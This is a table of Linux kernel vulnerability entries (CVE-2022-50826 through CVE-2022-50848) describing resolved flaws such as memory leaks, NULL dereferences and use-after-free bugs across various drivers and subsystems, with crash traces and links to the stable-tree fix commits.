| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ipu3-imgu: Fix NULL pointer dereference in imgu_subdev_set_selection() Calling v4l2_subdev_get_try_crop() and v4l2_subdev_get_try_compose() with a subdev state of NULL leads to a NULL pointer dereference. This can currently happen in imgu_subdev_set_selection() when the state passed in is NULL, as this method first gets pointers to both the "try" and "active" states and only then decides which to use. The same issue has been addressed for imgu_subdev_get_selection() with commit 30d03a0de650 ("ipu3-imgu: Fix NULL pointer dereference in active selection access"). However the issue still persists in imgu_subdev_set_selection(). Therefore, apply a similar fix as done in the aforementioned commit to imgu_subdev_set_selection(). To keep things a bit cleaner, introduce helper functions for "crop" and "compose" access and use them in both imgu_subdev_set_selection() and imgu_subdev_get_selection(). | 2025-12-30 | not yet calculated | CVE-2022-50826 | https://git.kernel.org/stable/c/fa6bbb4894b9b947063c6ff90018a954c5f9f4b3 https://git.kernel.org/stable/c/611d617bdb6c5d636a9861ec1c98e813fc8a5556 https://git.kernel.org/stable/c/5038ee677606106c91564f9c4557d808d14bad70 https://git.kernel.org/stable/c/dc608edf7d45ba0c2ad14c06eccd66474fec7847 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: scsi: lpfc: Fix memory leak in lpfc_create_port() Commit 5e633302ace1 ("scsi: lpfc: vmid: Add support for VMID in mailbox command") introduced allocations for the VMID resources in lpfc_create_port() after the call to scsi_host_alloc(). Upon failure on the VMID allocations, the new code would branch to the 'out' label, which returns NULL without unwinding anything, thus skipping the call to scsi_host_put(). Fix the problem by creating a separate label 'out_free_vmid' to unwind the VMID resources and make the 'out_put_shost' label call only scsi_host_put(), as was done before the introduction of allocations for VMID. | 2025-12-30 | not yet calculated | CVE-2022-50827 | https://git.kernel.org/stable/c/9749595feb33a1a2b848800192224ffeed5346b4 https://git.kernel.org/stable/c/5ea1f195f51c2bb5915ccfb2b2885ca81ce9262b https://git.kernel.org/stable/c/dc8e483f684a24cc06e1d5fa958b54db58855093 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: clk: zynqmp: Fix stack-out-of-bounds in strncpy` "BUG: KASAN: stack-out-of-bounds in strncpy+0x30/0x68" Linux-ATF interface is using 16 bytes of SMC payload. In case clock name is longer than 15 bytes, string terminated NULL character will not be received by Linux. Add explicit NULL character at last byte to fix issues when clock name is longer. This fixes below bug reported by KASAN: ================================================================== BUG: KASAN: stack-out-of-bounds in strncpy+0x30/0x68 Read of size 1 at addr ffff0008c89a7410 by task swapper/0/1 CPU: 1 PID: 1 Comm: swapper/0 Not tainted 5.4.0-00396-g81ef9e7-dirty #3 Hardware name: Xilinx Versal vck190 Eval board revA (QSPI) (DT) Call trace: dump_backtrace+0x0/0x1e8 show_stack+0x14/0x20 dump_stack+0xd4/0x108 print_address_description.isra.0+0xbc/0x37c __kasan_report+0x144/0x198 kasan_report+0xc/0x18 __asan_load1+0x5c/0x68 strncpy+0x30/0x68 zynqmp_clock_probe+0x238/0x7b8 platform_drv_probe+0x6c/0xc8 really_probe+0x14c/0x418 driver_probe_device+0x74/0x130 __device_attach_driver+0xc4/0xe8 bus_for_each_drv+0xec/0x150 __device_attach+0x160/0x1d8 device_initial_probe+0x10/0x18 bus_probe_device+0xe0/0xf0 device_add+0x528/0x950 of_device_add+0x5c/0x80 of_platform_device_create_pdata+0x120/0x168 of_platform_bus_create+0x244/0x4e0 of_platform_populate+0x50/0xe8 zynqmp_firmware_probe+0x370/0x3a8 platform_drv_probe+0x6c/0xc8 really_probe+0x14c/0x418 driver_probe_device+0x74/0x130 device_driver_attach+0x94/0xa0 __driver_attach+0x70/0x108 bus_for_each_dev+0xe4/0x158 driver_attach+0x30/0x40 bus_add_driver+0x21c/0x2b8 driver_register+0xbc/0x1d0 __platform_driver_register+0x7c/0x88 zynqmp_firmware_driver_init+0x1c/0x24 do_one_initcall+0xa4/0x234 kernel_init_freeable+0x1b0/0x24c kernel_init+0x10/0x110 ret_from_fork+0x10/0x18 The buggy address belongs to the page: page:ffff0008f9be1c88 refcount:0 mapcount:0 mapping:0000000000000000 index:0x0 raw: 0008d00000000000 ffff0008f9be1c90 ffff0008f9be1c90 0000000000000000 raw: 0000000000000000 0000000000000000 00000000ffffffff page dumped because: kasan: bad access detected addr ffff0008c89a7410 is located in stack of task swapper/0/1 at offset 112 in frame: zynqmp_clock_probe+0x0/0x7b8 this frame has 3 objects: [32, 44) 'response' [64, 80) 'ret_payload' [96, 112) 'name' Memory state around the buggy address: ffff0008c89a7300: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ffff0008c89a7380: 00 00 00 00 f1 f1 f1 f1 00 04 f2 f2 00 00 f2 f2 >ffff0008c89a7400: 00 00 f3 f3 00 00 00 00 00 00 00 00 00 00 00 00 ^ ffff0008c89a7480: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ffff0008c89a7500: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ================================================================== | 2025-12-30 | not yet calculated | CVE-2022-50828 | https://git.kernel.org/stable/c/5dbfcf7b080306b65d9f756fadf46c9495793750 https://git.kernel.org/stable/c/d9e2585c3bcecb1c83febad31b9f450e93d2509e https://git.kernel.org/stable/c/0a07b13af04d0db7325018aaa83b5ffe864790c9 https://git.kernel.org/stable/c/d66fea97671fcb516bd6d34bcc033f650ac7ee91 https://git.kernel.org/stable/c/bce41e4ac6f5ca3b22a07e8cdadc12044bbf9d3b https://git.kernel.org/stable/c/dd80fb2dbf1cd8751efbe4e53e54056f56a9b115 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: wifi: ath9k: hif_usb: Fix use-after-free in ath9k_hif_usb_reg_in_cb() It is possible that skb is freed in ath9k_htc_rx_msg(), then usb_submit_urb() fails and we try to free skb again. It causes use-after-free bug. Moreover, if alloc_skb() fails, urb->context becomes NULL but rx_buf is not freed and there can be a memory leak. The patch removes unnecessary nskb and makes skb processing more clear: it is supposed that ath9k_htc_rx_msg() either frees old skb or passes its managing to another callback function. Found by Linux Verification Center (linuxtesting.org) with Syzkaller. | 2025-12-30 | not yet calculated | CVE-2022-50829 | https://git.kernel.org/stable/c/5e8751a977a49a6e00cce1a8da5ca16da83f9c8c https://git.kernel.org/stable/c/f127c2b4c967025e5c3a4ce7e13b79135d46a33d https://git.kernel.org/stable/c/0c8dd2ea4b419da96ab4953e4967e9363e2f8a4f https://git.kernel.org/stable/c/988bd27de2484faf17afe0408db2e3d9e5ac61fc https://git.kernel.org/stable/c/98d9172822dc6f38138333941984bd759a89d419 https://git.kernel.org/stable/c/355f16f756aad0c95cdaa0c14a34ab4137d32815 https://git.kernel.org/stable/c/53b9bb1a00c4285ee7f58a11129dbea015db61bc https://git.kernel.org/stable/c/71fc0ad671a62c494d2aec731baeabd3bfe6c95d https://git.kernel.org/stable/c/dd95f2239fc846795fc926787c3ae0ca701c9840 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: auxdisplay: hd44780: Fix potential memory leak in hd44780_remove() hd44780_probe() allocates a memory chunk for hd with kzalloc() and makes "lcd->drvdata->hd44780" point to it. When we call hd44780_remove(), we should release all relevant memory and resource. But "lcd->drvdata ->hd44780" is not released, which will lead to a memory leak. We should release the "lcd->drvdata->hd44780" in hd44780_remove() to fix the memory leak bug. | 2025-12-30 | not yet calculated | CVE-2022-50830 | https://git.kernel.org/stable/c/8311961a1724bfc64390c539dedc31e067a80315 https://git.kernel.org/stable/c/6cd37f8232f5e169a723e1d5fbe3b2139c2ef763 https://git.kernel.org/stable/c/5d407911e605702ffcc0e97a6db546592ab27dd0 https://git.kernel.org/stable/c/ddf75a86aba2cfb7ec4497e8692b60c8c8fe0ee7 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: wifi: wilc1000: fix potential memory leak in wilc_mac_xmit() The wilc_mac_xmit() returns NETDEV_TX_OK without freeing skb, add dev_kfree_skb() to fix it. Compile tested only. | 2025-12-30 | not yet calculated | CVE-2022-50832 | https://git.kernel.org/stable/c/a12610e83789c838493034e5c50ac5c903ad8c0d https://git.kernel.org/stable/c/a1e94fb4d09d0fcfeaa73aa49d787f06c42db7ee https://git.kernel.org/stable/c/5706d00fde3f1d5eb7296a4dfefb6aea35108224 https://git.kernel.org/stable/c/07dcd756e28f27e4f8fcd8b809ffa05a5cc5de2b https://git.kernel.org/stable/c/baef42df7de7c35ba60b75a5f96d1eb039f4d782 https://git.kernel.org/stable/c/deb962ec9e1c9a81babd3d37542ad4bd6ac3396e |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: Bluetooth: use hdev->workqueue when queuing hdev->{cmd,ncmd}_timer works syzbot is reporting attempt to schedule hdev->cmd_work work from system_wq WQ into hdev->workqueue WQ which is under draining operation [1], for commit c8efcc2589464ac7 ("workqueue: allow chained queueing during destruction") does not allow such operation. The check introduced by commit 877afadad2dce8aa ("Bluetooth: When HCI work queue is drained, only queue chained work") was incomplete. Use hdev->workqueue WQ when queuing hdev->{cmd,ncmd}_timer works because hci_{cmd,ncmd}_timeout() calls queue_work(hdev->workqueue). Also, protect the queuing operation with RCU read lock in order to avoid calling queue_delayed_work() after cancel_delayed_work() completed. | 2025-12-30 | not yet calculated | CVE-2022-50833 | https://git.kernel.org/stable/c/c4635cf3d845a7324c25c52d549b70c8bd7ad4c7 https://git.kernel.org/stable/c/3c6b036fe5c8ed8b6c4cbdc03605929882907ef0 https://git.kernel.org/stable/c/deee93d13d385103205879a8a0915036ecd83261 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: nfc: Fix potential resource leaks nfc_get_device() take reference for the device, add missing nfc_put_device() to release it when not need anymore. Also fix the style warnning by use error EOPNOTSUPP instead of ENOTSUPP. | 2025-12-30 | not yet calculated | CVE-2022-50834 | https://git.kernel.org/stable/c/277f0d0a9084e7454e5532c823a7a876a7b00af7 https://git.kernel.org/stable/c/d1d912e7f82d7216ba4e266048ec1d1f5ea93839 https://git.kernel.org/stable/c/d8e410315ad393b23520b5db0706be853589c548 https://git.kernel.org/stable/c/e0f5c962c066e769c187f037fedc883f8abd4e82 https://git.kernel.org/stable/c/b63bc2db244c1b57e36f16ea5f2a1becda413f68 https://git.kernel.org/stable/c/a743128fca394a43425020a4f287d3168d94d04f https://git.kernel.org/stable/c/b32f6bef248562bb5191ada527717ea50b319466 https://git.kernel.org/stable/c/df49908f3c52d211aea5e2a14a93bbe67a2cb3af |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: jbd2: add miss release buffer head in fc_do_one_pass() In fc_do_one_pass() miss release buffer head after use which will lead to reference count leak. | 2025-12-30 | not yet calculated | CVE-2022-50835 | https://git.kernel.org/stable/c/e65506ff181fc176088f32117d69b9cb1ddda777 https://git.kernel.org/stable/c/56fcd0788f0d9243c1754bd6f80b8b327c4afeee https://git.kernel.org/stable/c/27c7bd35135d5ab38b9138ecf186ce54a96c98d9 https://git.kernel.org/stable/c/1f48116cbd3404898c9022892e114dd7cc3063c1 https://git.kernel.org/stable/c/dfff66f30f66b9524b661f311bbed8ff3d2ca49f |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: remoteproc: sysmon: fix memory leak in qcom_add_sysmon_subdev() The kfree() should be called when of_irq_get_byname() fails or devm_request_threaded_irq() fails in qcom_add_sysmon_subdev(), otherwise there will be a memory leak, so add kfree() to fix it. | 2025-12-30 | not yet calculated | CVE-2022-50836 | https://git.kernel.org/stable/c/27441fab2651cd909d8a5440ca079bc50245f427 https://git.kernel.org/stable/c/e4539eb5c0c342567183fe386d0699c8dab49490 https://git.kernel.org/stable/c/131c0a3ead78d45f0f39ddb42cf1bd9be26239b0 https://git.kernel.org/stable/c/1a62bebe0705556d37cfa8409ddc759b11d404f6 https://git.kernel.org/stable/c/ec97e9a5c2f25d2f9f9d7005e9ac67f23cc751cd https://git.kernel.org/stable/c/e01ce676aaef3b13d02343d7e70f9637d93a3367 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: net: dsa: tag_8021q: avoid leaking ctx on dsa_tag_8021q_register() error path If dsa_tag_8021q_setup() fails, for example due to the inability of the device to install a VLAN, the tag_8021q context of the switch will leak. Make sure it is freed on the error path. | 2025-12-30 | not yet calculated | CVE-2022-50837 | https://git.kernel.org/stable/c/09f30f394e832ed09859b6a80fdd20668a9104ff https://git.kernel.org/stable/c/39691d51af99f80efb9e365f94b8e0c791fa1a2f https://git.kernel.org/stable/c/14ed46a13aba42a6ddd85de6f6274090df3586a5 https://git.kernel.org/stable/c/e095493091e850d5292ad01d8fbf5cde1d89ac53 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: net: stream: purge sk_error_queue in sk_stream_kill_queues() Changheon Lee reported TCP socket leaks, with a nice repro. It seems we leak TCP sockets with the following sequence: 1) SOF_TIMESTAMPING_TX_ACK is enabled on the socket. Each ACK will cook an skb put in error queue, from __skb_tstamp_tx(). __skb_tstamp_tx() is using skb_clone(), unless SOF_TIMESTAMPING_OPT_TSONLY was also requested. 2) If the application is also using MSG_ZEROCOPY, then we put in the error queue cloned skbs that had a struct ubuf_info attached to them. Whenever an struct ubuf_info is allocated, sock_zerocopy_alloc() does a sock_hold(). As long as the cloned skbs are still in sk_error_queue, socket refcount is kept elevated. 3) Application closes the socket, while error queue is not empty. Since tcp_close() no longer purges the socket error queue, we might end up with a TCP socket with at least one skb in error queue keeping the socket alive forever. This bug can be (ab)used to consume all kernel memory and freeze the host. We need to purge the error queue, with proper synchronization against concurrent writers. | 2025-12-30 | not yet calculated | CVE-2022-50838 | https://git.kernel.org/stable/c/c8c1eec578a9ae2dc8f14a1846942a0b7bf29d1d https://git.kernel.org/stable/c/bab542cf56fc174c8447c00b73be99ffd66d2d39 https://git.kernel.org/stable/c/6f00bd0402a1e3d2d556afba57c045bd7931e4d3 https://git.kernel.org/stable/c/4f1d37ff4226eb99d6b69e9f4518e279e1a851bf https://git.kernel.org/stable/c/9062493811676ee0efe6c74d98f00ca38c4e17d4 https://git.kernel.org/stable/c/9da204cd67c4fe97e8aa465d10d5c2e7076f7f42 https://git.kernel.org/stable/c/8c330c36b3970d0917f48827fa6c7a9c75aa4602 https://git.kernel.org/stable/c/b458d349f8753f666233828ebd30df6f100cf7d5 https://git.kernel.org/stable/c/e0c8bccd40fc1c19e1d246c39bcf79e357e1ada3 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: jbd2: fix potential buffer head reference count leak As in 'jbd2_fc_wait_bufs' if buffer isn't uptodate, will return -EIO without update 'journal->j_fc_off'. But 'jbd2_fc_release_bufs' will release buffer head from 'j_fc_off - 1' if 'bh' is NULL will terminal release which will lead to buffer head buffer head reference count leak. To solve above issue, update 'journal->j_fc_off' before return -EIO. | 2025-12-30 | not yet calculated | CVE-2022-50839 | https://git.kernel.org/stable/c/7a33dde572fceb45d02d188e0213c47059401c93 https://git.kernel.org/stable/c/e7385c868ee038d6a0cb0e85c22d2741e7910fd5 https://git.kernel.org/stable/c/68ed9c76b2affd47177b92495446abb7262d0ef7 https://git.kernel.org/stable/c/9b073d73725366d886b711b74e058c02f51e7a0e https://git.kernel.org/stable/c/e0d5fc7a6d80ac2406c7dfc6bb625201d0250a8a |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: scsi: snic: Fix possible UAF in snic_tgt_create() Smatch reports a warning as follows: drivers/scsi/snic/snic_disc.c:307 snic_tgt_create() warn: '&tgt->list' not removed from list If device_add() fails in snic_tgt_create(), tgt will be freed, but tgt->list will not be removed from snic->disc.tgt_list, then list traversal may cause UAF. Remove from snic->disc.tgt_list before free(). | 2025-12-30 | not yet calculated | CVE-2022-50840 | https://git.kernel.org/stable/c/f9d8b8ba0f1a16cde0b1fc9e80466df76b6db8ff https://git.kernel.org/stable/c/3772319e40527e6a5f2ec1d729e01f271d818f5c https://git.kernel.org/stable/c/3007f96ca20c848d0b1b052df6d2cb5ae5586e78 https://git.kernel.org/stable/c/6866154c23fba40888ad6d554cccd4bf2edb755e https://git.kernel.org/stable/c/ad27f74e901fc48729733c88818e6b96c813057d https://git.kernel.org/stable/c/1895e908b3ae66a5312fd1b2cdda2da82993dca7 https://git.kernel.org/stable/c/c7f0f8dab1ae5def57c1a8a9cafd6fabe1dc27cc https://git.kernel.org/stable/c/4141cd9e8b3379aea52a85d2c35f6eaf26d14e86 https://git.kernel.org/stable/c/e118df492320176af94deec000ae034cc92be754 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: fs/ntfs3: Add overflow check for attribute size The offset addition could overflow and pass the used size check given an attribute with very large size (e.g., 0xffffff7f) while parsing MFT attributes. This could lead to out-of-bound memory R/W if we try to access the next attribute derived by Add2Ptr(attr, asize) [ 32.963847] BUG: unable to handle page fault for address: ffff956a83c76067 [ 32.964301] #PF: supervisor read access in kernel mode [ 32.964526] #PF: error_code(0x0000) - not-present page [ 32.964893] PGD 4dc01067 P4D 4dc01067 PUD 0 [ 32.965316] Oops: 0000 [#1] PREEMPT SMP NOPTI [ 32.965727] CPU: 0 PID: 243 Comm: mount Not tainted 5.19.0+ #6 [ 32.966050] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS rel-1.14.0-0-g155821a1990b-prebuilt.qemu.org 04/01/2014 [ 32.966628] RIP: 0010:mi_enum_attr+0x44/0x110 [ 32.967239] Code: 89 f0 48 29 c8 48 89 c1 39 c7 0f 86 94 00 00 00 8b 56 04 83 fa 17 0f 86 88 00 00 00 89 d0 01 ca 48 01 f0 8d 4a 08 39 f9a [ 32.968101] RSP: 0018:ffffba15c06a7c38 EFLAGS: 00000283 [ 32.968364] RAX: ffff956a83c76067 RBX: ffff956983c76050 RCX: 000000000000006f [ 32.968651] RDX: 0000000000000067 RSI: ffff956983c760e8 RDI: 00000000000001c8 [ 32.968963] RBP: ffffba15c06a7c38 R08: 0000000000000064 R09: 00000000ffffff7f [ 32.969249] R10: 0000000000000007 R11: ffff956983c760e8 R12: ffff95698225e000 [ 32.969870] R13: 0000000000000000 R14: ffffba15c06a7cd8 R15: ffff95698225e170 [ 32.970655] FS: 00007fdab8189e40(0000) GS:ffff9569fdc00000(0000) knlGS:0000000000000000 [ 32.971098] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 [ 32.971378] CR2: ffff956a83c76067 CR3: 0000000002c58000 CR4: 00000000000006f0 [ 32.972098] Call Trace: [ 32.972842] <TASK> [ 32.973341] ni_enum_attr_ex+0xda/0xf0 [ 32.974087] ntfs_iget5+0x1db/0xde0 [ 32.974386] ? slab_post_alloc_hook+0x53/0x270 [ 32.974778] ? ntfs_fill_super+0x4c7/0x12a0 [ 32.975115] ntfs_fill_super+0x5d6/0x12a0 [ 32.975336] get_tree_bdev+0x175/0x270 [ 32.975709] ? put_ntfs+0x150/0x150 [ 32.975956] ntfs_fs_get_tree+0x15/0x20 [ 32.976191] vfs_get_tree+0x2a/0xc0 [ 32.976374] ? capable+0x19/0x20 [ 32.976572] path_mount+0x484/0xaa0 [ 32.977025] ? putname+0x57/0x70 [ 32.977380] do_mount+0x80/0xa0 [ 32.977555] __x64_sys_mount+0x8b/0xe0 [ 32.978105] do_syscall_64+0x3b/0x90 [ 32.978830] entry_SYSCALL_64_after_hwframe+0x63/0xcd [ 32.979311] RIP: 0033:0x7fdab72e948a [ 32.980015] Code: 48 8b 0d 11 fa 2a 00 f7 d8 64 89 01 48 83 c8 ff c3 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 44 00 00 49 89 ca b8 a5 00 00 008 [ 32.981251] RSP: 002b:00007ffd15b87588 EFLAGS: 00000206 ORIG_RAX: 00000000000000a5 [ 32.981832] RAX: ffffffffffffffda RBX: 0000557de0aaf060 RCX: 00007fdab72e948a [ 32.982234] RDX: 0000557de0aaf260 RSI: 0000557de0aaf2e0 RDI: 0000557de0ab7ce0 [ 32.982714] RBP: 0000000000000000 R08: 0000557de0aaf280 R09: 0000000000000020 [ 32.983046] R10: 00000000c0ed0000 R11: 0000000000000206 R12: 0000557de0ab7ce0 [ 32.983494] R13: 0000557de0aaf260 R14: 0000000000000000 R15: 00000000ffffffff [ 32.984094] </TASK> [ 32.984352] Modules linked in: [ 32.984753] CR2: ffff956a83c76067 [ 32.985911] ---[ end trace 0000000000000000 ]--- [ 32.986555] RIP: 0010:mi_enum_attr+0x44/0x110 [ 32.987217] Code: 89 f0 48 29 c8 48 89 c1 39 c7 0f 86 94 00 00 00 8b 56 04 83 fa 17 0f 86 88 00 00 00 89 d0 01 ca 48 01 f0 8d 4a 08 39 f9a [ 32.988232] RSP: 0018:ffffba15c06a7c38 EFLAGS: 00000283 [ 32.988532] RAX: ffff956a83c76067 RBX: ffff956983c76050 RCX: 000000000000006f [ 32.988916] RDX: 0000000000000067 RSI: ffff956983c760e8 RDI: 00000000000001c8 [ 32.989356] RBP: ffffba15c06a7c38 R08: 0000000000000064 R09: 00000000ffffff7f [ 32.989994] R10: 0000000000000007 R11: ffff956983c760e8 R12: ffff95698225e000 [ 32.990415] R13: 0000000000000000 R14: ffffba15c06a7cd8 R15: ffff95698225e170 [ 32.991011] FS: ---truncated--- | 2025-12-30 | not yet calculated | CVE-2022-50841 | https://git.kernel.org/stable/c/d4489ba8fb806e07b43eecca5e9af5865d94cbf6 https://git.kernel.org/stable/c/a1f0b873cf6ac1f00a749707d866494ed0708978 https://git.kernel.org/stable/c/0bb9f93ba63acfdb7c363d9f9fc2199fc6fa913d https://git.kernel.org/stable/c/e19c6277652efba203af4ecd8eed4bd30a0054c9 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: drm/virtio: Check whether transferred 2D BO is shmem Transferred 2D BO always must be a shmem BO. Add check for that to prevent NULL dereference if userspace passes a VRAM BO. | 2025-12-30 | not yet calculated | CVE-2022-50842 | https://git.kernel.org/stable/c/f134f261d76ae3d5ecf68db642eaa746ceb84cfb https://git.kernel.org/stable/c/f122bcb34f1a4b02ef3d95058d8fd1316ea03785 https://git.kernel.org/stable/c/989164305b933af06d69bb91044dafbd01025371 https://git.kernel.org/stable/c/36e133af33ea54193378b190cf92c47c12a43d34 https://git.kernel.org/stable/c/e473216b42aa1fd9fc6b94b608b42c210c655908 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: dm clone: Fix UAF in clone_dtr() Dm_clone also has the same UAF problem when dm_resume() and dm_destroy() are concurrent. Therefore, cancelling timer again in clone_dtr(). | 2025-12-30 | not yet calculated | CVE-2022-50843 | https://git.kernel.org/stable/c/520b56cfd9faee7683f081c3a38f11a81b13a68e https://git.kernel.org/stable/c/342cfd8426dff4228e6c714bcb9fc8295a2748dd https://git.kernel.org/stable/c/856edd0e92f3fe89606b704c86a93daedddfe6ec https://git.kernel.org/stable/c/b1ddb666073bb5f36390aaabaa1a4d48d78c52ed https://git.kernel.org/stable/c/9e113cd4f61f3b0000843b2d0a90ce8b40a1fcff https://git.kernel.org/stable/c/e4b5957c6f749a501c464f92792f1c8e26b61a94 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: drm/amdgpu: Fix type of second parameter in odn_edit_dpm_table() callback With clang's kernel control flow integrity (kCFI, CONFIG_CFI_CLANG), indirect call targets are validated against the expected function pointer prototype to make sure the call target is valid to help mitigate ROP attacks. If they are not identical, there is a failure at run time, which manifests as either a kernel panic or thread getting killed. A proposed warning in clang aims to catch these at compile time, which reveals: drivers/gpu/drm/amd/amdgpu/../pm/swsmu/amdgpu_smu.c:3008:29: error: incompatible function pointer types initializing 'int (*)(void *, uint32_t, long *, uint32_t)' (aka 'int (*)(void *, unsigned int, long *, unsigned int)') with an expression of type 'int (void *, enum PP_OD_DPM_TABLE_COMMAND, long *, uint32_t)' (aka 'int (void *, enum PP_OD_DPM_TABLE_COMMAND, long *, unsigned int)') [-Werror,-Wincompatible-function-pointer-types-strict] .odn_edit_dpm_table = smu_od_edit_dpm_table, ^~~~~~~~~~~~~~~~~~~~~ 1 error generated. There are only two implementations of ->odn_edit_dpm_table() in 'struct amd_pm_funcs': smu_od_edit_dpm_table() and pp_odn_edit_dpm_table(). One has a second parameter type of 'enum PP_OD_DPM_TABLE_COMMAND' and the other uses 'u32'. Ultimately, smu_od_edit_dpm_table() calls ->od_edit_dpm_table() from 'struct pptable_funcs' and pp_odn_edit_dpm_table() calls ->odn_edit_dpm_table() from 'struct pp_hwmgr_func', which both have a second parameter type of 'enum PP_OD_DPM_TABLE_COMMAND'. Update the type parameter in both the prototype in 'struct amd_pm_funcs' and pp_odn_edit_dpm_table() to 'enum PP_OD_DPM_TABLE_COMMAND', which cleans up the warning. | 2025-12-30 | not yet calculated | CVE-2022-50844 | https://git.kernel.org/stable/c/f9084e9930db562bdcd47fa199a66fb45e16dab5 https://git.kernel.org/stable/c/24cba9d865157c9e23128fbcf8b86f5da9570edd https://git.kernel.org/stable/c/36217f676b55932a12d6732c95388150015fdee6 https://git.kernel.org/stable/c/e4d0ef752081e7aa6ffb7ccac11c499c732a2e05 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ext4: fix inode leak in ext4_xattr_inode_create() on an error path There is issue as follows when do setxattr with inject fault: [localhost]# fsck.ext4 -fn /dev/sda e2fsck 1.46.6-rc1 (12-Sep-2022) Pass 1: Checking inodes, blocks, and sizes Pass 2: Checking directory structure Pass 3: Checking directory connectivity Pass 4: Checking reference counts Unattached zero-length inode 15. Clear? no Unattached inode 15 Connect to /lost+found? no Pass 5: Checking group summary information /dev/sda: ********** WARNING: Filesystem still has errors ********** /dev/sda: 15/655360 files (0.0% non-contiguous), 66755/2621440 blocks This occurs in 'ext4_xattr_inode_create()'. If 'ext4_mark_inode_dirty()' fails, dropping i_nlink of the inode is needed. Or will lead to inode leak. | 2025-12-30 | not yet calculated | CVE-2022-50845 | https://git.kernel.org/stable/c/0f709e08caffb41bbc9b38b9a4c1bd0769794007 https://git.kernel.org/stable/c/eab94a46560f68d4bcd15222701ced479f84f427 https://git.kernel.org/stable/c/9ef603086c5b796fde1c7f22a17d0fc826ba54cb https://git.kernel.org/stable/c/9882601ee689975c1c0076ee65bf222a2a35e535 https://git.kernel.org/stable/c/322cf639b0b7f137543072c55545adab782b3a25 https://git.kernel.org/stable/c/fdaaf45786dc8c17a72901021772520fceb18f8c https://git.kernel.org/stable/c/70e5b46beba64706430a87a6d516054225e8ac8a https://git.kernel.org/stable/c/e4db04f7d3dbbe16680e0ded27ea2a65b10f766a |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: mmc: via-sdmmc: fix return value check of mmc_add_host() mmc_add_host() may return error, if we ignore its return value, it will lead two issues: 1. The memory that allocated in mmc_alloc_host() is leaked. 2. In the remove() path, mmc_remove_host() will be called to delete device, but it's not added yet, it will lead a kernel crash because of null-ptr-deref in device_del(). Fix this by checking the return value and goto error path which will call mmc_free_host(). | 2025-12-30 | not yet calculated | CVE-2022-50846 | https://git.kernel.org/stable/c/076bcd2c93e16b05c10564e299d6e5d26a766d00 https://git.kernel.org/stable/c/12b8e81b77c05c658efd9cde3585bbd65ae39b59 https://git.kernel.org/stable/c/95025a8dd0ec015872f6c16473fe04d6264e68ca https://git.kernel.org/stable/c/f59ef2a47a228e51322ad76752a55a8917c56e38 https://git.kernel.org/stable/c/63400da6cd37a9793c19bb6aed7131b58b975a04 https://git.kernel.org/stable/c/0959cc1685eb19774300d43ef25e318b457b156b https://git.kernel.org/stable/c/0ec94795114edc7e24ec71849dce42bfa61dafa3 https://git.kernel.org/stable/c/ba91b413983a9235792523c6b9f7ba2586c4d75d https://git.kernel.org/stable/c/e4e46fb61e3bb4628170810d3f2b996b709b90d9 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: drm/bridge: it6505: Initialize AUX channel in it6505_i2c_probe During device boot, the HPD interrupt could be triggered before the DRM subsystem registers it6505 as a DRM bridge. In such cases, the driver tries to access AUX channel and causes NULL pointer dereference. Initializing the AUX channel earlier to prevent such error. | 2025-12-30 | not yet calculated | CVE-2022-50847 | https://git.kernel.org/stable/c/8ed8505803774fc3f36a432718036c21cc51e2ba https://git.kernel.org/stable/c/172d4d64075075f955e6e416915e3f287eec514a https://git.kernel.org/stable/c/e577d4b13064c337b83fe7edecb3f34e87144821 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: drivers: dio: fix possible memory leak in dio_init() If device_register() returns error, the 'dev' and name needs be freed. Add a release function, and then call put_device() in the error path, so the name is freed in kobject_cleanup() and to the 'dev' is freed in release function. | 2025-12-30 | not yet calculated | CVE-2022-50848 | https://git.kernel.org/stable/c/affe3cea6b3148fa66796a48640664822ceccd48 https://git.kernel.org/stable/c/4b68caa95064ac464f1b261d08ac677e753d1088 https://git.kernel.org/stable/c/a524e7fed696a4dfef671e0fda3511bfd2dca0cf https://git.kernel.org/stable/c/da64e01da40c6b71a54144126da53cc3b27201ac https://git.kernel.org/stable/c/fce9890e1be4c0460dad850cc8c00414a9d25f0f https://git.kernel.org/stable/c/a0ead7e8da84f4c3759417b8e928b65e0207c646 https://git.kernel.org/stable/c/8e002b9fe831b27d4506df6fa60cb33ba0730ac3 https://git.kernel.org/stable/c/78fddc0ff971f9874d53c854818cc4aafa144114 https://git.kernel.org/stable/c/e63e99397b2613d50a5f4f02ed07307e67a190f1 |
